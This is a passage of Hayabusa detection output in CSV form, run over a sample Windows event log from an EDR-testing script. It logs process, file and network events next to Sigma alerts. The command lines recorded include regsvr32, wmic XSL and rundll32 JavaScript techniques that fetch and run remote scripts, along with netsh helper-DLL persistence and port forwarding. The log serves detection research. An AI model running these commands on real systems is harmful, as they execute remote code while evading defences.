747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.287 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:45.581 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:46.095 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:46.095 +00:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.340 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.748 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.748 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.889 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:50.104 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:50.104 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:53.776 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:53.843 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.630 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.630 +00:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.718 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:56.665 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.256 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.256 +00:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.286 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.485 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.598 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.683 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.330 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.420 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.420 +00:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.434 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.442 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.442 +00:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.460 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.460 +00:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.466 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.466 +00:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.731 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.970 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:01.090 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.252 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.502 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.542 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.388 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:11.501 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:12.352 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 